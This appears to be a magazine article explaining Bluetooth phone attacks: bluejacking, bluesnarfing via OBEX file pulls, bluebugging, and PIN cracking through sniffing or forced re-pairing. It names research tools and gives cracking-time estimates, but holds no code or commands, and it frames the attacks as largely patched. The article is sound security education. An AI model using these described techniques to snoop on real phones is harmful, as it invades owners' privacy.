Is Bluetooth secure? Inquiring minds want to know. Ever since the first Bluetooth-enabled mobile phones started appearing a couple of years ago, numerous reports have suggested that the wireless technology is vulnerable to snooping.
First, the popular press jumped onto bluejacking, which lets complete strangers send anonymous and unsolicited messages to certain Bluetooth phones. Then came reports that some phones were vulnerable to bluesnarfing, which makes it possible for someone to access a phone wirelessly without the owner's knowledge and download the stored phonebook and calendar and sometimes more. More recently, reports have described bluebugging, in which someone can theoretically take complete wireless control of virtually any Bluetooth phone and use it for all kinds of illicit purposes.
What the articles don't tell you, though, is just how unlikely it is for any of these bluesomething attacks to affect you. Some early Bluetooth phones did have some security holes, but they were due to faulty implementations, not Bluetooth weaknesses, and the phones' manufacturers have since released firmware upgrades that fix them. Also, the more serious attacks, such as bluesnarfing and bluebugging, require hardware and software and know-how that's beyond the reach of just about everyone except professional spies or the most obsessed privacy snoops.
This isn't to say, of course, that Bluetooth is absolutely, totally secure. The jury is still out, actually, on just how secure Bluetooth is. There's scant evidence, however, that the likes of bluejacking, bluesnarfing, and bluebugging have caused any real problems, although the Bluetooth attackers seem to get more numerous and more sophisticated day by day.
One thing that has become clear, though, is that Bluetooth security and user convenience involve some serious tradeoffs. Some of the first Bluetooth mobile phones from Nokia, for example, made it very easy to connect to other Bluetooth devices, such as headsets. Their default settings turned Bluetooth on and set it to "visible" or "discoverable" modea necessary condition for connecting. Unfortunately, such visible phones were also visible to bluejackers and bluesnarfers, who didn't hesitate to "discover" them. Also, the designers of some early phones, in an attempt to make life simpler for users, didn't require user input of a PIN in certain situations where they thought it wouldn't be necessary. Again, the result was bluejacking and bluesnarfing.
Bluejacking, the earliest Bluetooth attack, is a good example of how security and user convenience affect each other. The most common method of bluejacking works via the process of sending an electronic business carda good feature to have at business meetings and trade shows. Bluejackers alter the card-passing procedure, though, to make the business card appear as a short message, and then they choose a nearby discoverable Bluetooth phone to send it to. People with phones in nondiscoverable mode avoid being bluejacked, but they have to perform an extra step of setting discoverability in order to receive a legitimate business card.
Bluejacking is very easy to do. It begins with the creation of a new contact in a bluejacker's own phonebook, but in the name field, instead of typing a person's name, the bluejacker types a short message. Then, it's simply a matter of choosing a nearby Bluetooth phoneon a subway or in a shopping mall, for exampleto send it to. Phones that are in discoverable mode, and thus available to be bluejacked, appear on the display of the bluejacker's phone. After choosing one, perhaps at random, the bluejacker sends the ersatz business card, and the contact "name" (the message) pops up on the bluejacked phone.
Because bluejacking is so easy, it has become almost a fad in Europe, where the first Bluetooth phones were sold. Creative bluejackers have a knack for making it amusing, and some even initiate casual sexual encounters in a wireless ritual called "toothing." Apparently, not all bluejack targets mind the intrusion.
But phone makers, of course, don't find bluejacking amusing, and having been burned by bad publicity, they now stress security over easy connectivity. No recently introduced phones, for example, set Bluetooth on and discoverable at startup or even remain in discoverable mode for very long at any time. If a user puts a phone in discoverable mode in order to pair with another device, the phone will stay discoverable only for a short timetypically one to five minutes. Some, but not all, of the first Bluetooth phones behaved this way; now they all do.
As with bluejacking, being nondiscoverable also helps a Bluetooth mobile phone avoid bluesnarfing, an invasion of privacy that's much more damaging. With bluesnarfing, you can wirelessly connect to some early Bluetooth phones without the phone owner's knowledge and download the phonebook, the calendar, and sometimes more. An advanced version of bluesnarfing can even alter those files in some bluesnarfed phones.
Bluesnarfing is not a simple procedure, however, and software assistance is necessary to pull it off. Initially, the software required a laptop to run it, so a bluesnarfer within Bluetooth's short range was at risk of being noticed. Now, however, bluesnarfing software written in Java can run on any J2ME-enabled cell phone, which is less likely to draw suspicion.
A primary means of bluesnarfing is with a program called Bloover. (The name, a combination of Bluetooth and Hoover, was chosen because the programs sucks information, much like a Hoover vacuum cleaner sucks dirt.) Bloover was written by Martin Herfurt, a researcher at Salzburg Research Forschungsgesellschaft m.b.H. and a lecturer at the University of Salzburg. Earlier work in defining the bluesnarf vulnerability was done by Adam Laurie, then with U.K.-based A.L. Digital, and now chief security officer of The Bunker Secure Hosting Ltd., and by Marcel Holtman, a Bluetooth and Linux expert. Herfurt, Laurie, and Holtman are all members of the Bluetooth SIG Security Expert Group.
As explained in a presentation by Laurie, Holtman, and Herfurt earlier this year, Bluesnarfing works, as does bluejacking, through the mechanism for exchanging business cards. Using the OBEX protocol, which is commonly used for such exchanges, the bluesnarfing software connects to a target Bluetooth device via Bluetooth's OBEX Push profile. Then, however, instead of pushing a business card, it pulls, using a "get" request for files with known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs).
What makes bluesnarfing possible in this situation is the way the OBEX Push profile was implemented in some early Bluetooth phones from Nokia and SonyEricsson. One particular shortcoming was the failure to require authentication of another Bluetooth device that attempts to perform a push, thus making these phones easier targets. Normally, two Bluetooth devices exchange information only after an authentication procedure that depends on the same PIN having been input to both devices. But the designers of some phonesapparently thinking that users wouldn't want to exchange and type PINs for a simple exchange of business cardsomitted authentication. Firmware upgrades that correct the problem are now available, but many phone owners haven't installed them.
Like bluejacking, bluesnarfing aims at phones that are in discoverable mode, but it can also workin theoryagainst certain phones that aren't in discoverable mode. In order to succeed against an nondiscoverable phone, bluesnarfing software needs to address the phone by its unique 48-bit Bluetooth device name, and coming up with the name is sometimes possible with software assistance. A program called RedFang, written by Ollie Whitehouse of U.K.-based @stake, does the job (sometimes) with what's basically a brute-force approach, trying every possible combination of characters and noting which combinations get a response.
The main difficulty with discovering undiscoverable Bluetooth devices is that the process can take hours of computing time. Whitehouse noted in an October 2003 research report, however, that it's sometimes possible to shorten the time by "seeding" the procedure with intelligent guesses. For example, part of the default name for many phones is simply the phone's model number. Even so, the approach can still take a long time. Also, Bluetooth specification 1.2, released soon after Whitehouse's report, addresses the weakness that allows the brute-force approach. It adds an anonymity mode that masks Bluetooth radios' physical addresses.
Bluebugging goes well beyond bluejacking and bluesnarfing, allowing virtually complete takeover of a phone. A bluebugger can wirelessly direct a phone to make calls without the owner's knowledge, for example, after which the phone works as a bugging device, picking up conversations in the phone's immediate area. Similarly, a bluebugger can set call forwarding and then receive calls intended for the bluebug victim. Bluebuggers also have bluesnarf capability, so they can read phonebooks and calendars and more. They can even read a phone's call list to see who their victims called or who called them. They can even alter those lists.
Fortunately, only a few early models of Bluetooth phones are vulnerable to bluebugging. Their Bluetooth implementations were faulty and have since been corrected with new firmware. Some reports have pointed out a way that Bluebugging can also succeed against other, additional phones, but that method requires the owner of the target phone to more-or-less play the role of a sucker. Basically, the bluebugger talks the victim into handing over the phone, which the bluebugger manipulates to set up a "backdoor" attack and then hands back.
The phones that are inherently vulnerable to bluebugging can be commandeered without physical contact. As with bluejacking and bluesnarfing, the process sometimes begins with the pushing of an electronic business card. On a few early Motorola phones, for example, someone could send a business card using a procedure that, for convenience, didn't require authentication or PIN entry. Then, due to flaws in the phones' Bluetooth implementations, a bluebugger could interrupt the sending process, and the bluebugger's phone would remain listed in the victim's phone as a "trusted" device. Having made it that far, the bluebugger could then connect to the bluebugged phone's Bluetooth headset. Then, with that connection, the bluebugger could enter AT commands that control the phone.
With newer phones, and with older phones that have been fixed with firmware upgrades, bluebugging becomes much more difficult. As noted in a presentation given in April of last year by Whitehouse, it can be done, but it requires special hardware and lots of computing power, and it's not practical when users employ PINs of more than a few digits.
What Whitehouse suggested last year is the use of a Bluetooth "sniffer," to monitor traffic between Bluetooth devices, plus some number crunching to recover a user PIN from that traffic. A sniffer records Bluetooth packets and can decode the packets to determine the information contained in them. If you capture packets that are involved in the process of authenticating two Bluetooth devices, you can use information from those packets to determine the user PIN. The packet data doesn't contain the PIN itself, but it contains information derived from the PIN. With some number crunching, you can recover the PIN, and then you're in.
But there are some real difficulties with this approach. First of all, a Bluetooth sniffer is special, expensive gear; you can't just walk into Circuit City and buy one. Also, the required number crunching can be prohibitive. In his presentation last year, Whitehouse estimated that an 850-MHz Pentium III could recover a 6-digit PIN in 12.5 seconds, but it would need nearly 4000 years for a 16-digit PIN.
Another difficulty with PIN cracking is that the sniffer has to intercept a pairing process, as when a Bluetooth phone initially connects to a Bluetooth headset. But pairings seldom occur in public places. Most people pair their headset and their phone once, usually at home or in an office, and the two devices then "trust" each other, so no further pairing is necessary.
In June of this year, however, two Israeli researchers proposed a way to force a pairing, which would make PIN cracking more predictable. According to Avishai Wool and Yaniv Shaked, both of Tel Aviv University, a bluebugger pretends to be one of two Bluetooth devices that are attempting to communicate with each other. The bluebugger does this by spoofing the device's Bluetooth name, which is viewable by any nearby Bluetooth device. The spoof tells the other of the two devices that it somehow lost the link key, a shared piece of information that lets the two devices know they can trust each other. Because a shared link key is essential to sharing information, this other device then discards its own link key and initiates a pairing process to create a new one. The pairing requires PIN entry, which provides an opportunity to sniff the devices' traffic and eventually recover the PIN.
But even a forced pairing doesn't make it easy to recover a PIN. For one thing, a bluebugger still faces the same number-crunching obstacles described earlier by Whitehouse. Shaked and Wool note that a 3-GHz Pentium IV computer can crack a 4-digit PIN in 63 msec, or a 6-digit PIN in about seven seconds. Cracking a 7-digit PIN, however, takes over four hours, and longer PINs take much longer.
Another difficulty with this approach , as noted by Wool and Shaked, is that it "requires the attacker to inject a specific message at a precise point in the protocol. This most likely needs a custom Bluetooth device since off-the-shelf components will be unable to support such behavior." Also, if such an attack forces a new pairing, the owner or owners of the attacked devices might decide to postpone pairing until there's an opportunity to do it in private.
So, then, Bluetooth's vulnerability comes down to a few key points:
- Early, faulty Bluetooth implementations, since corrected.
- Users choosing short PINs that are easy to crack with brute-force computing.
- Users unwisely pairing Bluetooth devices in public places.
- Motivated, dedicated privacy snoops willing and able to use special, and sometime expensive, hardware and software.
And, of course, user convenience. It's easier for users to leave Bluetooth turned on and discoverable. It's easier to use a short PIN than a long one.
But users concerned about security will give up a little convenience to get it. And, increasingly, manufacturers of Bluetooth phones, understanding the tradeoff between security and convenience, will design their phones in ways that push users toward security. They don't want to be accused of marketing vulnerable technology, after all. They've had enough of that already.
About the Author
Gary Legg is a Boston-based freelance writer. He holds a BSEE degree and is a former editor and executive editor of EDN magazine. He can be reached at firstname.lastname@example.org